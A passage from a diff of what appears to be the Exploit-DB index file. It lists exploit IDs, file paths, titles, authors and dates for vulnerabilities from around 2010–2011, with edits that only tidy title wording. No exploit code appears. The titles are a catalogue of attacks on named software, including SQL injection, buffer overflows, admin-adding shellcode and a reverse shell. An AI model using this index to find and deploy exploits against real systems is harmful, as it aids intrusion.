Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 -14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 -14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0 +14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 +14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,windows,dos,0 @@ -13092,7 +13093,7 @@ id,file,description,date,author,platform,type,port 15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 15011,platforms/php/webapps/15011.txt,"PHP microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 -15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 +15014,platforms/php/webapps/15014.txt,"PixelPost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0 36828,platforms/java/webapps/36828.txt,"JaWiki - 'versionNo' Parameter Cross-Site Scripting",2012-02-17,sonyy,java,webapps,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - '.mp3' / '.wma' Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -13104,11 +13105,11 @@ id,file,description,date,author,platform,type,port 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - '.m3u' Denial of Service",2010-10-03,"xsploited security",windows,dos,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 -15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 +15029,platforms/php/webapps/15029.txt,"phpMyFamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15032,platforms/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 - '.wav' / '.mp3' Denial of Service",2010-09-17,modpr0be,windows,dos,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 -15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - .bmp Crash (PoC)",2010-09-18,andrew,windows,dos,0 +15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection",2010-09-18,secret,php,webapps,0 @@ -13126,8 +13127,8 @@ id,file,description,date,author,platform,type,port 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,php,webapps,0 -15061,platforms/windows/dos/15061.txt,"Microsoft drm technology (msnetobj.dll) ActiveX - Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 -15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'filename' init() .bss (PoC)",2010-09-20,Stoke,linux,dos,0 +15061,platforms/windows/dos/15061.txt,"Microsoft DRM Technology (msnetobj.dll) ActiveX - Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 +15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename' init() .bss (PoC)",2010-09-20,Stoke,linux,dos,0 15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 @@ -13162,7 +13163,7 @@ id,file,description,date,author,platform,type,port 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 -15157,platforms/php/webapps/15157.txt,"je GuestBook 1.0 joomla component - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 +15157,platforms/php/webapps/15157.txt,"je Guestbook 1.0 joomla Component - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0 15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 - (eCal Module) Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0 @@ -13201,7 +13202,7 @@ id,file,description,date,author,platform,type,port 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps,0 -15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP - Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 +15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0 15169,platforms/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",php,webapps,0 15174,platforms/php/webapps/15174.txt,"tiki wiki CMS groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 @@ -13241,7 +13242,7 @@ id,file,description,date,author,platform,type,port 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0 -15224,platforms/php/webapps/15224.txt,"js Calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 +15224,platforms/php/webapps/15224.txt,"js Calendar 1.5.1 joomla Component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 @@ -13252,13 +13253,13 @@ id,file,description,date,author,platform,type,port 15594,platforms/php/webapps/15594.txt,"AuraCMS - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - file download",2010-11-22,Beach,jsp,webapps,0 -15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0 +15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 -15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 -15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 -15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload",2010-11-23,trycyber,php,webapps,0 -15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 +15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 +15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0 +15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' File Upload",2010-11-23,trycyber,php,webapps,0 +15605,platforms/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",windows,remote,0 @@ -13279,7 +13280,7 @@ id,file,description,date,author,platform,type,port 15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0 15247,platforms/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,php,webapps,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 -15249,platforms/php/webapps/15249.txt,"Data/File - upload and management Arbitrary File Upload",2010-10-14,saudi0hacker,php,webapps,0 +15249,platforms/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,php,webapps,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,php,webapps,0 15608,platforms/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0 @@ -13293,17 +13294,17 @@ id,file,description,date,author,platform,type,port 15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 15265,platforms/asp/remote/15265.rb,"ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 -15266,platforms/windows/remote/15266.txt,"Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 +15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 -15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 +15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 -15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - $ORIGIN expansion",2010-10-18,"Tavis Ormandy",linux,local,0 +15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0 -15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 +15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 @@ -13316,8 +13317,8 @@ id,file,description,date,author,platform,type,port 15292,platforms/windows/remote/15292.rb,"ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 15295,platforms/php/webapps/15295.html,"sNews CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 -15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory corruption",2010-10-21,Abysssec,windows,remote,0 -15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 / 6.5 - Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 +15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory Corruption",2010-10-21,Abysssec,windows,remote,0 +15297,platforms/windows/dos/15297.txt,"Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)",2010-10-22,"Tavis Ormandy",linux,local,0 15305,platforms/windows/dos/15305.pl,"RarmaRadio 2.53.1 - '.m3u' Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos,0 @@ -13334,7 +13335,7 @@ id,file,description,date,author,platform,type,port 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0 -15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -13346,10 +13347,10 @@ id,file,description,date,author,platform,type,port 15330,platforms/php/webapps/15330.txt,"NinkoBB 1.3RC5 - Cross-Site Scripting",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15331,platforms/php/webapps/15331.txt,"Zomplog 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15332,platforms/php/webapps/15332.txt,"BlogBird Platform - Multiple Cross-Site Scripting Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0 -15333,platforms/windows/remote/15333.txt,"MinaliC Webserver 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0 -15334,platforms/windows/dos/15334.py,"MinaliC Webserver 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 -15335,platforms/php/webapps/15335.txt,"alstrasoft e-friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 -15336,platforms/windows/remote/15336.txt,"MinaliC Webserver 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 +15333,platforms/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0 +15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 +15335,platforms/php/webapps/15335.txt,"Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 +15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection",2010-10-27,EraGoN,php,webapps,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 @@ -13362,21 +13363,21 @@ id,file,description,date,author,platform,type,port 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0 -15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 +15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal",2010-10-29,chr1x,windows,remote,0 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 -15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - (fckeditor) Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0 -15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0 +15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0 +15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 -15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 -15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Remote Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 +15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 +15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 -15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Remote Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 +15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 @@ -13391,19 +13392,19 @@ id,file,description,date,author,platform,type,port 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",php,webapps,0 -15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload",2010-11-02,[sh3n],php,webapps,0 +15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - 'FCKeditor' Arbitrary File Upload",2010-11-02,[sh3n],php,webapps,0 15391,platforms/php/webapps/15391.txt,"Azaronline Design - SQL Injection",2010-11-02,XroGuE,php,webapps,0 15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 - CSS Denial of Service",2010-11-02,4n0nym0us,windows,dos,0 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15396,platforms/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15397,platforms/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15393,platforms/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service",2010-11-02,moigai,windows,dos,0 -15398,platforms/asp/webapps/15398.txt,"Digger Solutions Newsletter Open Source - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 +15398,platforms/asp/webapps/15398.txt,"Digger Solutions NewsLetter Open Source - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15399,platforms/asp/webapps/15399.txt,"Site2Nite Business eListings - SQL Injection",2010-11-02,"L0rd CrusAd3r",asp,webapps,0 15400,platforms/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,php,webapps,0 -15917,platforms/php/webapps/15917.txt,"Ignition 1.3 - (comment.php) Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 -15403,platforms/windows/local/15403.py,"Minishare 1.4.0 < 1.5.5 - Buffer Overflow (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 -15406,platforms/windows/local/15406.rb,"Minishare 1.5.5 - Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 +15917,platforms/php/webapps/15917.txt,"Ignition 1.3 - 'comment.php' Local File Inclusion",2011-01-06,n0n0x,php,webapps,0 +15403,platforms/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - Buffer Overflow (users.txt)",2010-11-02,"Chris Gabriel",windows,local,0 +15406,platforms/windows/local/15406.rb,"MiniShare 1.5.5 - Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",windows,local,0 15404,platforms/php/webapps/15404.txt,"eLouai's Force Download Script - Arbitrary Local File Download",2010-11-03,v1R00Z,php,webapps,0 15405,platforms/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection",2010-11-03,Silic0n,php,webapps,0 15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite - NtCreateKey Race Condition",2010-11-03,"Nikita Tarakanov",windows,dos,0 @@ -13422,18 +13423,18 @@ id,file,description,date,author,platform,type,port 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption Exploit",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 -15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 +15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) - SQL 